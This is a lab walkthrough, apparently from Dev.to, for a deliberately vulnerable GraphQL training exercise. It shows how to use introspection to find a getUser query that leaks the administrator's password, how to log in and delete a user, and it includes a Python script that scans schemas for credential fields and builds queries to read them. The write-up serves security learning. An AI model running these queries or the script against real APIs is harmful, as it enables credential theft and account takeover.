Lab: Accidental exposure of private GraphQL fields

Published: (January 13, 2026 at 11:26 PM EST)
1 min read
Source: Dev.to


Lab Overview

The user-management functions for this lab are powered by a GraphQL endpoint. An access-control flaw lets unauthenticated callers read private credential fields through the API. The goal is to sign in as the administrator and delete the user carlos.

Lab link:

Accessing the GraphQL Endpoint

  1. Open My account and attempt a login with any credentials.
  2. The login request is a POST to /graphql containing a GraphQL mutation with username and password.
  3. The mutation fails to authenticate, but the request still reaches the GraphQL server.

Introspection

The server has introspection enabled, allowing the full schema to be discovered.

  1. Intercept the login mutation in your proxy (e.g., Burp Suite).
  2. Send the intercepted request to the Repeater.
  3. In the request body, right‑click → GraphQL → Set introspection query.
  4. Send the request. The response returns the complete schema.

Tip: Use the InQL Burp extension to browse the returned schema more conveniently than reading the raw JSON.

Exploiting the Vulnerability

Introspection shows a getUser query that returns a User type whose fields include username and password, and nothing restricts who may select them. Craft a query to retrieve them:

query {
  getUser(id: 1) {
    username
    password
  }
}

Send this query to the /graphql endpoint (e.g., via the Repeater or a GraphQL client). With id: 1 the response reveals the administrator’s username and password.
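As an added example (not code from the original post or from the lab), the following Python script automates what the post does by hand: it walks an introspection response from the query root, flags object types whose field names look like credentials, including types reachable only through nested fields, and renders the query that reads them. The introspection JSON embedded in it is constructed for this example; only the names getUser, User, username and password come from the post, the getBlogPost/BlogPost/author types are invented to show the nested case, and no endpoint URL is assumed because the script runs offline.

```python
"""Walk a GraphQL introspection result for credential-bearing fields.

Added example; not code from the original post or from the lab itself. The
introspection response below is constructed: the names Query, User, getUser
and password follow the post, the rest is invented to exercise nested paths.
"""
import json


def _ref(kind, name):   # named type reference, as __Type appears in introspection output
    return {"kind": kind, "name": name, "ofType": None}


def _nn(inner):         # NON_NULL wrapper around another type reference
    return {"kind": "NON_NULL", "name": None, "ofType": inner}


# Constructed sample response (data.__schema), trimmed to the keys this walker reads.
INTROSPECTION_RESPONSE = json.dumps({"data": {"__schema": {
    "queryType": {"name": "Query"},
    "types": [
        {"kind": "OBJECT", "name": "Query", "fields": [
            {"name": "getUser", "args": [{"name": "id", "type": _nn(_ref("SCALAR", "Int"))}],
             "type": _ref("OBJECT", "User")},
            {"name": "getBlogPost", "args": [{"name": "id", "type": _nn(_ref("SCALAR", "Int"))}],
             "type": _ref("OBJECT", "BlogPost")},
        ]},
        {"kind": "OBJECT", "name": "User", "fields": [
            {"name": "id", "args": [], "type": _nn(_ref("SCALAR", "Int"))},
            {"name": "username", "args": [], "type": _ref("SCALAR", "String")},
            {"name": "password", "args": [], "type": _ref("SCALAR", "String")},
        ]},
        {"kind": "OBJECT", "name": "BlogPost", "fields": [
            {"name": "id", "args": [], "type": _nn(_ref("SCALAR", "Int"))},
            {"name": "title", "args": [], "type": _ref("SCALAR", "String")},
            {"name": "author", "args": [], "type": _ref("OBJECT", "User")},  # invented nested path to User
        ]},
        {"kind": "SCALAR", "name": "Int", "fields": None},
        {"kind": "SCALAR", "name": "String", "fields": None},
    ],
}}})

# Field-name fragments that usually mean a credential or secret is being served.
SENSITIVE_HINTS = ("password", "passwd", "secret", "token", "hash", "salt", "apikey", "api_key")


def unwrap(type_ref):
    """Strip NON_NULL / LIST wrappers and return the named type reference."""
    while type_ref.get("ofType"):
        type_ref = type_ref["ofType"]
    return type_ref


def find_sensitive_paths(introspection_json):
    """Return every path from a query-root field to an object type with sensitive fields."""
    schema = json.loads(introspection_json)["data"]["__schema"]
    types = {t["name"]: t for t in schema["types"]}
    hits = []

    def walk(type_name, path, root_field, seen):
        t = types.get(type_name)
        if t is None or t["kind"] != "OBJECT" or type_name in seen:  # scalars, enums, cycles
            return
        fields = t.get("fields") or []
        leaky = [f["name"] for f in fields if any(h in f["name"].lower() for h in SENSITIVE_HINTS)]
        if leaky:
            hits.append({
                "path": path, "type": type_name, "sensitive": leaky,
                "args": [a["name"] for a in root_field["args"]],
                # Only scalar/enum fields can be selected without a sub-selection.
                "select": [f["name"] for f in fields if unwrap(f["type"])["kind"] in ("SCALAR", "ENUM")],
            })
        for f in fields:
            walk(unwrap(f["type"])["name"], path + [f["name"]], root_field, seen | {type_name})

    for qf in types[schema["queryType"]["name"]]["fields"]:
        walk(unwrap(qf["type"])["name"], [qf["name"]], qf, frozenset())
    return hits


def build_query(hit, arg_values):
    """Render a query that reads every selectable field of the leaky type along hit['path']."""
    args = ", ".join(f"{k}: {json.dumps(v)}" for k, v in arg_values.items())
    lines, depth = ["query {"], 1
    for i, name in enumerate(hit["path"]):
        lines.append("  " * depth + (f"{name}({args})" if i == 0 and args else name) + " {")
        depth += 1
    lines.extend("  " * depth + f for f in hit["select"])
    while depth > 1:
        depth -= 1
        lines.append("  " * depth + "}")
    lines.append("}")
    return "\n".join(lines)


if __name__ == "__main__":
    for hit in find_sensitive_paths(INTROSPECTION_RESPONSE):
        print(f"{'.'.join(hit['path'])} -> {hit['type']} exposes {hit['sensitive']}")
        print(build_query(hit, {"id": 1}))
```

Run against a real introspection dump (paste the JSON body of the Repeater response in place of the constructed sample), the first hit reproduces the getUser query from the post; the second shows why checking only the direct return type of each root field is not enough, since a sensitive type is often reachable through a nested field. The script only reads the schema; send the rendered query from Repeater as described above.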

Solution

  1. Log in as the administrator using the leaked credentials.
  2. Delete the user with the username carlos.

The lab is then marked as complete.
